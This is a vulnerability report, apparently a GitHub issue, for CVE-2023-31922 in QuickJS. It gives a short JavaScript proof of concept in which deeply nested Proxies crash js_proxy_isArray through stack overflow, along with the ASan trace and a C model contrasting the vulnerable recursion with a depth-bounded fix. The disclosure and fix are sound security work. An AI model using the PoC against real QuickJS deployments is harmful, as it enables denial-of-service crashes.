CVE-2023-31922: AddressSanitizer: stack-overflow · Issue #178 · bellard/quickjs

QuickJS commit 2788d71 was discovered to contain a stack-overflow via the component js_proxy_isArray at quickjs.c.


QuickJS Version

Version : 2788d71

platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoC testcase

Array.isArray([]);
Array.isArray({}), Array.isArray(null), Array.isArray(0), Array.isArray(0.1),
Array.isArray(""), Array.isArray(void 0),
Array.isArray(new Proxy([], {})), Array.isArray(new Proxy({}, {})),
Array.isArray(new Proxy(new Proxy([], {}), {})),
Array.isArray(new Proxy(new Proxy({}, {}), {}));
for (var r = new Proxy([], {}), y = 0; y < 131072; y++) r = new Proxy(r, {});
Array.isArray(r), RangeError;

// poc.js
for (var r = new Proxy([], {}), y = 0; y < 131072; y++) r = new Proxy(r, {});
Array.isArray(r);

Execution steps & Output

js_proxy_isArray() and JS_IsArray() call each other recursively, once per level of Proxy nesting, and nothing bounds the depth of this mutual recursion. With the 131072 nested proxies built by the PoC the recursion is unbounded for practical purposes and exhausts the native stack, which AddressSanitizer reports as a stack-overflow.

$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING
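The recursion pattern above, modelled in a small C program added here as an illustration. This is not QuickJS code: it uses its own toy Value type and assumed names such as check_chain_bounded and MAX_PROXY_DEPTH. The vulnerable shape lets the recursion depth follow the length of an attacker-built proxy chain; the hardened shape carries a depth counter and fails closed with an error code that an engine could report as a RangeError instead of exhausting the stack.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

/* Toy object graph constructed for this example (not QuickJS's types): a value
 * is a plain array, a plain object, or a proxy wrapping another value. */
typedef enum { V_ARRAY, V_OBJECT, V_PROXY } ValueKind;
typedef struct Value {
    ValueKind kind;
    struct Value *target;   /* used only when kind == V_PROXY */
} Value;

/* Return codes of the hardened checker (names assumed for this example). */
enum { ISARRAY_FALSE = 0, ISARRAY_TRUE = 1, ISARRAY_STACK_OVERFLOW = -1 };

/* Vulnerable shape: the two functions call each other once per level of proxy
 * nesting with no depth bound, so stack use follows the attacker's chain length. */
static bool is_array_unbounded(const Value *v);
static bool proxy_is_array_unbounded(const Value *v)
{
    return is_array_unbounded(v->target);
}
static bool is_array_unbounded(const Value *v)
{
    switch (v->kind) {
    case V_ARRAY: return true;
    case V_PROXY: return proxy_is_array_unbounded(v);
    default:      return false;
    }
}

/* Hardened shape: same mutual recursion, but a depth counter travels with it and
 * the walk fails closed past MAX_PROXY_DEPTH instead of consuming native stack. */
#define MAX_PROXY_DEPTH 1000
static int is_array_bounded(const Value *v, int depth);
static int proxy_is_array_bounded(const Value *v, int depth)
{
    if (depth >= MAX_PROXY_DEPTH)
        return ISARRAY_STACK_OVERFLOW;
    return is_array_bounded(v->target, depth + 1);
}
static int is_array_bounded(const Value *v, int depth)
{
    switch (v->kind) {
    case V_ARRAY: return ISARRAY_TRUE;
    case V_PROXY: return proxy_is_array_bounded(v, depth);
    default:      return ISARRAY_FALSE;
    }
}

/* Wrap `base` in `n` proxies, the C equivalent of the PoC's for-loop. */
static Value *wrap_in_proxies(Value *base, size_t n)
{
    Value *cur = base;
    for (size_t i = 0; i < n; i++) {
        Value *p = malloc(sizeof *p);
        if (!p)
            abort();
        p->kind = V_PROXY;
        p->target = cur;
        cur = p;
    }
    return cur;
}

static void free_chain(Value *top)   /* iterative; stops at the non-proxy base */
{
    while (top && top->kind == V_PROXY) {
        Value *next = top->target;
        free(top);
        top = next;
    }
}

/* Run the hardened checker over `n` proxies around an array or a plain object. */
int check_chain_bounded(size_t n, bool base_is_array)
{
    Value base = { base_is_array ? V_ARRAY : V_OBJECT, NULL };
    Value *top = wrap_in_proxies(&base, n);
    int r = is_array_bounded(top, 0);
    free_chain(top);
    return r;
}

/* Same for the vulnerable checker. Only safe for short chains: at the PoC's
 * depth of 131072 this recursion is what ASan reports as a stack-overflow. */
bool check_chain_unbounded(size_t n, bool base_is_array)
{
    Value base = { base_is_array ? V_ARRAY : V_OBJECT, NULL };
    Value *top = wrap_in_proxies(&base, n);
    bool r = is_array_unbounded(top);
    free_chain(top);
    return r;
}

int main(void)
{
    printf("bounded, 3 proxies around []:      %d\n", check_chain_bounded(3, true));
    printf("bounded, 131072 proxies around []: %d\n", check_chain_bounded(131072, true));
    printf("unbounded, 3 proxies around []:    %d\n", check_chain_unbounded(3, true));
    return 0;
}
```

A fixed depth counter is one mitigation; engines also commonly compare the current stack pointer against a recorded limit before each recursive step. Either way the property to check is the same: the result for the PoC chain must be an error, never a crash, and the shallow cases must still answer correctly.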

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
